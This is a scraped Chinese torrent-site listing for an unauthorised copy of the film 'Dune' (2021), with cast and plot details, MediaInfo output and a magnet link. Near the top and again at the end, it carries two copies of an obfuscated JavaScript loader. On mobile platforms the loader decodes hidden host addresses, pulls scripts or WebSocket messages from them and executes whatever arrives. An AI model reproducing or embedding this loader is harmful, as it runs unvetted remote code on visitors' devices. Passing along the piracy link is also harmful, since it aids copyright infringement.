沙丘[特效字幕.小体积].Dune.2021.1080p.HMAX.WEB-DL.DDP5.1.Atmos.H264-BBQDDQ.COM 9.79GB

B4dmin7 1月前 747

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 沙丘 / 沙丘瀚战(港)

◎片 名 Dune

◎年 代 2021

◎产 地 加拿大 / 匈牙利 / 美国

◎类 别 剧情 / 科幻 / 冒险

◎语 言 英语

◎上映日期 2021-10-22(美国/中国大陆) / 2021-09-03(威尼斯电影节) / 2021-09-11(多伦多电影节)

◎IMDb链接 https://www.imdb.com/title/tt1160419/

◎豆瓣评分 8.0/10 (6183人评价)

◎豆瓣链接 https://movie.douban.com/subject/3001114/

◎片 长 156分钟

◎导 演 丹尼斯·维伦纽瓦 Denis Villeneuve (id:1028333)

◎编 剧 丹尼斯·维伦纽瓦 Denis Villeneuve (id:1028333)

乔·斯派茨 Jon Spaihts (id:1320120)

艾瑞克·罗斯 Eric Roth (id:1000393)

弗兰克·赫伯特 Frank Herbert (id:1028181)

◎演 员 蒂莫西·柴勒梅德 Timothée Chalamet (id:1325862)

丽贝卡·弗格森 Rebecca Ferguson (id:1088314)

奥斯卡·伊萨克 Oscar Isaac (id:1012481)

戴夫·巴蒂斯塔 Dave Bautista (id:1014003)

赞达亚 Zendaya (id:1325576)

杰森·莫玛 Jason Momoa (id:1022614)

乔什·布洛林 Josh Brolin (id:1004568)

哈维尔·巴登 Javier Bardem (id:1054414)

斯特兰·斯卡斯加德 Stellan Skarsg?rd (id:1017918)

夏洛特·兰普林 Charlotte Rampling (id:1007020)

大卫·达斯马齐连 David Dastmalchian (id:1337583)

莎伦·邓肯-布鲁斯特 Sharon Duncan-Brewster (id:1192335)

斯蒂芬·亨德森 Stephen Henderson (id:1098483)

迈克尔·纳尔多内 Michael Nardone (id:1132642)

张震 Chen Chang (id:1077991)

巴布斯·奥卢桑莫昆 Babs Olusanmokun (id:1412919)

Oliver Ryan Oliver Ryan (id:1450193)

查理·罗尔斯 Charlie Rawes (id:1395007)

格洛里亚·奥比安约 Gloria Obianyo (id:1417321)

保罗·布林 Paul Bullion (id:1392807)

比约恩·弗赖贝格 Bj?rn Freiberg (id:1409305)

理查德·P·鲁宾斯坦 Richard P. Rubinstein (id:1019479)

凯文·J·安德森 Kevin J. Anderson (id:1054184)

丹尼斯·维伦纽瓦 Denis Villeneuve (id:1028333)

托马斯·图尔 Thomas Tull (id:1348364)

汉斯·季默 Hans Zimmer (id:1054386)

格雷格·弗莱瑟 Greig Fraser (id:1028361)

乔·沃克 Joe Walker (id:1336020)

帕特里斯·维梅特 Patrice Vermette (id:1299995)

汤姆·布朗 Tom Brown (id:1055694)

理查德·罗伯茨 Richard Roberts (id:1295779)

杰奎琳·韦斯特 Jacqueline West (id:1300754)

◎标 签 科幻 / 沙丘 / 美国 / 2021 / 奇幻 / 经典 / 冒险 / 剧情

◎简 介

电影《沙丘》为观众呈现了一段神秘而感人至深的英雄之旅。天赋异禀的少年保罗·厄崔迪被命运指引,为了保卫自己的家族和人民,决心前往浩瀚宇宙间最危险的星球,开启一场惊心动魄的冒险。与此同时,各路势力为了抢夺这颗星球上一种能够释放人类最大潜力的珍贵资源而纷纷加入战场。最终,唯有那些能够战胜内心恐惧的人才能生存下去。

◎获奖情况 (共2项)

第7届豆瓣电影年度榜单 (2020)

最值得期待的外语电影(提名)

第6届豆瓣电影年度榜单 (2019)

最值得期待的外语电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 13102625301862323035702916372965621046 (0x9DB794DB3CF468812C7806279F7FD36)

  4. Complete name : Dune.2021.1080p.HMAX.WEB-DL.DDP5.1.Atmos.H264-KKYY.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.79 GiB

  8. Duration : 2 h 35 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 9 017 kb/s

  11. Encoded date : UTC 2021-10-24 15:26:22

  12. Writing application : mkvmerge v20.0.0 ('I Am The Sun') 64-bit

  13. Writing library : libebml v1.3.5 + libmatroska v1.4.8


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 35 min

  24. Bit rate mode : Variable

  25. Bit rate : 8 250 kb/s

  26. Maximum bit rate : 12.4 Mb/s

  27. Width : 1 920 pixels

  28. Height : 816 pixels

  29. Display aspect ratio : 2.35:1

  30. Frame rate mode : Constant

  31. Frame rate : 23.976 (24000/1001/53354) FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.220

  37. Stream size : 8.94 GiB (91%)

  38. Writing library : x264 core 157 r2965 861cec4

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x113 / me=hex / subme=7 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=16 / chroma_me=1 / trellis=1 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=25 / lookahead_threads=4 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / bframes=3 / b_pyramid=2 / b_adapt=1 / b_bias=0 / direct=1 / weightb=1 / open_gop=0 / weightp=2 / keyint=96 / keyint_min=96 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=40 / rc=2pass / mbtree=1 / bitrate=8250 / ratetol=1.0 / qcomp=0.60 / qpmin=0 / qpmax=69 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=12375 / vbv_bufsize=6187 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  40. Default : Yes

  41. Forced : No

  42. Color range : Limited

  43. Color primaries : BT.709

  44. Transfer characteristics : BT.709

  45. Matrix coefficients : BT.709


  46. Audio

  47. ID : 2

  48. Format : E-AC-3 JOC

  49. Format/Info : Enhanced AC-3 with Joint Object Coding

  50. Commercial name : Dolby Digital Plus with Dolby Atmos

  51. Codec ID : A_EAC3

  52. Duration : 2 h 35 min

  53. Bit rate mode : Constant

  54. Bit rate : 768 kb/s

  55. Channel(s) : 6 channels

  56. Channel layout : L R C LFE Ls Rs

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 31.250 FPS (1536 SPF)

  59. Compression mode : Lossy

  60. Stream size : 854 MiB (9%)

  61. Service kind : Complete Main

  62. Default : Yes

  63. Forced : No

  64. Complexity index : 16

  65. Number of dynamic objects : 15

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Text

  69. ID : 3

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 2 h 35 min

  75. Bit rate : 20.6 kb/s

  76. Count of elements : 3203

  77. Stream size : 22.9 MiB (0%)

  78. Title : 中英特效@KKYY

  79. Language : Chinese

  80. Default : Yes

  81. Forced : No




复制代码


TAGS 冒险 剧情 科幻

磁力链:
  • magnet:?xt=urn:btih:5555FCCB4D86C89CEC83FBF0071B13B8136C239B

上传的附件:
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};